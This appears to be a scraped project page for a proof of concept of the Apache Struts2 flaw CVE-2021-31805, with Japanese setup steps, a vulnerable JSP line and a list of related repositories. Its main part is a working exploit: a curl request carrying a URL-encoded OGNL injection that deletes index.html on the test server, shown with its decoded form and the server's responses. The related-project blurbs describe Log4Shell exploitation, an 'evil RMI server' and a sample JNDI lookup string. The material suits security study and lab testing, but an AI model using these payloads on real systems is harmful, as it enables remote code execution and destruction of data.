PoC for CVE-2021-31805 (Apache Struts2)

Overview

CVE-2021-31805

PoC for CVE-2021-31805 (Apache Struts2) CVE-2021-31805の解説記事で使用したアプリケーションです。

セットアップ

$ docker-compose build
$ docker-compose up -d

動作確認

http://localhost:8080/struts2-showcase-2.5.29/index.html にアクセスしWelcomeページが表示されることを確認します。

Exploit

$ curl -I 'http://localhost:8080/struts2-showcase-2.5.29/index.html'
HTTP/1.1 200
(略)
$ curl -I 'http://localhost:8080/struts2-showcase-2.5.29/skill/list.action?skillName=%28%23%61%70%70%6c%69%63%61%74%69%6f%6e%5b%27%6f%72%67%2e%61%70%61%63%68%65%2e%63%61%74%61%6c%69%6e%61%2e%72%65%73%6f%75%72%63%65%73%27%5d%2e%67%65%74%52%65%73%6f%75%72%63%65%28%27%2f%69%6e%64%65%78%2e%68%74%6d%6c%27%29%2e%64%65%6c%65%74%65%28%29%29'
HTTP/1.1 200
(略)
URLデコードした値は
skillName=(#application['org.apache.catalina.resources'].getResource('/index.html').delete())
です。

$ curl -I 'http://localhost:8080/struts2-showcase-2.5.29/index.html'
HTTP/1.1 404
(snip)
index.htmlファイルが削除されていることが確認できます。

脆弱なコードの例

<li><s:label id="test2" name="%{skillName}"/></li>

参考情報

You might also like...

A singular file to protect as many Minecraft servers and clients as possible from the Log4j exploit (CVE-2021-44228).

MC-Log4J-Patcher The goal of this project is to provide Minecraft players, and server owners, peace of mind in regards to the recently discovered Log4

Jan 4, 2022

An evil RMI server that can launch an arbitrary command. May be useful for CVE-2021-44228

evil-rmi-server An evil RMI server that can launch an arbitrary command. May be useful for CVE-2021-44228 in a local privesc scenario Build ./gradlew

Nov 9, 2022

Log4j CVE-2021-44228 examples: Remote Code Execution (through LDAP, RMI, ...), Forced DNS queries, ...

Log4j CVE-2021-44228 and CVE-2021-45046 Requisites Use a vulnerable JDK, for instance JDK 1.8.0_181 Usage Malicious server The malicious server deploy

Feb 7, 2022

Test case to check if the Log4Shell/CVE-2021-44228 hotfix will raise any unexpected exceptions

Log4Shell Hotfix Side Effect Test Case I wanted to know if any ClassNotFoundException or similar unexpected exception is raised when one applies the C

Nov 9, 2022

A short demo of CVE-2021-44228

sample-ldap-exploit A short demo of CVE-2021-44228 Build $ mvn clean verify Run Attacker $ java \ -cp 'attacker/target/sample-attacker.jar:attacker

Oct 19, 2022

This project will help to test the Log4j CVE-2021-44228 vulnerability.

Log4j-JNDIServer This project will help to test the Log4j CVE-2021-44228/CVE-2021-45046 vulnerabilities. Installation and Building Load the project on

Jun 30, 2022

Spring Boot Log4j - CVE-2021-44228 Docker Lab

Spring Boot Log4j - CVE-2021-44228 Docker Lab

Spring Boot Log4j - CVE-2021-44228 The Log4Shell vulnerability (CVE-2021-44228) ultimately is a quite simple JNDI Injection flaw, but in a really real

Jun 10, 2022

Spring Boot web application vulnerable to CVE-2021-44228, nicknamed Log4Shell.

Spring Boot web application vulnerable to CVE-2021-44228, nicknamed Log4Shell.

Log4Shell sample vulnerable application (CVE-2021-44228) This repository contains a Spring Boot web application vulnerable to CVE-2021-44228, nickname

Jan 5, 2023

Vulnerability CVE-2021-44228 checker

CVE-2021-44228 checker This is the repository for checking for vulnerability CVE-2021-44228. This is a PoC that only displays strings without any exte

Nov 9, 2022
Owner
null
Log4J CVE-2021-44228 Minecraft PoC

CVE-2021-44228 in Minecraft Java 16 Paper server build #397 Minecraft 1.17.1 Exploitation In Java 16 only deserialization attacks work by default usin

myxl 5 Feb 15, 2022
Apache Log4j2 CVE-2021-44228 RCE Demo with RMI and LDAP

CVE-2021-44228-Demo 利用 CVE-2021-44228,通过 RMI 和 LDAP 两种方式远程注入代码的示例。 Exploit class from RMI Server loaded Hello, ${jndi:rmi://127.0.0.1:1099/exploit} Ex

Zhuang Ma 2 Dec 14, 2021
CVE-2021-44228 - Apache log4j RCE quick test

Build ./build.sh Start log4j RCE Server ./start-log4j-rce-server.sh Test Run java -cp log4j-rce-1.0-SNAPSHOT-all.jar log4j Check if you get logs in ha

Jeffrey Li 3 Feb 1, 2022
Some tools to help mitigating Apache Log4j 2 CVE-2021-44228

JndiLookup Some tool to help analyzing Apache Log4j 2 CVE-2021-44228 This tool uses the "lookup" feature from log4j-2 to test against the JNDI vulnera

Daniel Fages 3 Dec 18, 2021
CVE-2021-2109 && Weblogic Server RCE via JNDI

Description Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected

Al1ex 29 Nov 21, 2022
openam-CVE-2021-35464 tomcat 执行命令回显

openam CVE-2021-35464 tomcat 执行命令回显. 项目基于 ysoserial 和 Java-Rce-Echo 构建项目需要在依赖中加入ysoserial.jar和jato-14.6.3.jar POST /OpenAM/ccversion/Version HTTP/1.1

Y4er 89 Dec 15, 2022
log4j2 Log4Shell CVE-2021-44228 proof of concept

Log4Shell CVE-2021-44228 proof of concept Requirement Java (JDK/JRE) 8 or later version curl exploitable Simple spring boot application that serves a

Seshu Pasam 2 Dec 21, 2021
Spring Cloud Netflix Hystrix Dashboard template resolution vulnerability CVE-2021-22053

CVE-2021-22053: Spring Cloud Netflix Hystrix Dashboard template resolution vulnerability Severity High Vendor Spring by VMware Description Application

SCSL 38 Dec 16, 2022
Small example repo for looking into log4j CVE-2021-44228

log4j CVE-2021-44228 Lame useless repo to look into log4j CVE-2021-44228. Setup The repository contains a .idea/ folder which is a IntelliJ IDEA proje

null 65 Dec 13, 2022
Scan and patch tool for CVE-2021-44228 and related log4j concerns.

A Log4J2 CVE-2021-44228 Vulnerability Scanner and Patcher Links to download the latest version: Linux x64 with glibc2.17+ (RHEL7+) Windows & all other

SAS Software 33 Jun 1, 2022